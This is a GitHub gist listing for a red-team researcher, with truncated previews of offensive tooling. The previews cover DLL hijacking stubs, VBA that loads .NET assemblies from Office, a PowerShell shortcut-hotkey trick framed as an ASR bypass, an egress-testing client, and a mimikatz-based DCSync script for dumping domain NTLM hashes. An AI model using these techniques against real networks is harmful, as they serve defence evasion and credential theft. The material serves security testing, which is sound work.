Skip to content

Instantly share code, notes, and snippets.


Nick Landers monoxgas

  • Silent Break Security
  • Utah, United States
View GitHub Profile

Keybase proof

I hereby claim:

  • I am monoxgas on github.
  • I am monoxgas ( on keybase.
  • I have a public key ASCY7hWSUiJvdx6-976NCpVJx_ePWPOc6E3cuJz5PA8dygo

To claim this, I am signing this object:

monoxgas / main.cpp
Created Feb 12, 2020
Adaptive DLL Hijacking - Patching LoadLibrary Return
View main.cpp
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
// Get primary module info
monoxgas / main.cpp
Created Feb 12, 2020
Adapative DLL Hijacking - Stability Hooking
View main.cpp
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
// Insert evil stuff
monoxgas / mscorlib_load_assembly.vba
Last active May 29, 2020
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
View mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
Const LS As LongPtr = 4&
monoxgas / shortcut.ps1
Last active May 29, 2020
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
View shortcut.ps1
$Shell = New-Object -Com WScript.Shell
$S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk")
$S.TargetPath = "calc.exe"
$S.Hotkey = "Ctrl+U"
Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk"
View Egress
function Invoke-EgressAssess
Egress-assess powershell client.
This script will connect to an Egress-assess server and transfer faux Personally Identifiable Information or
#!/usr/bin/env python
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
monoxgas / Invoke-DCSync.ps1
Last active Sep 15, 2020
What more could you want?
View Invoke-DCSync.ps1
This file has been truncated, but you can view the full file.
function Invoke-DCSync
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
View siriproxy-nick.rb
require 'cora'
require 'siri_objects'
require 'pp'
class SiriProxy::Plugin::Nick < SiriProxy::Plugin
def initialize(config)
#if you have custom configuration options, process them here!
View gist:1455623
filter "StartRequest", direction: :from_iphone do |object|
puts "[Info - Button Information] #{object["properties"]}"
say "I don't have any #{object["properties"]["utterance"].capitalize} muffins, sorry..." #Fails Here, Logs the Say but never actually says it
object = false #After a while, it will google search my utterance I used
def createButton(text, utterance, command)
startRequest =, false, true) #Does the true proxyOnly parameter matter here?
sendCommand =
You can’t perform that action at this time.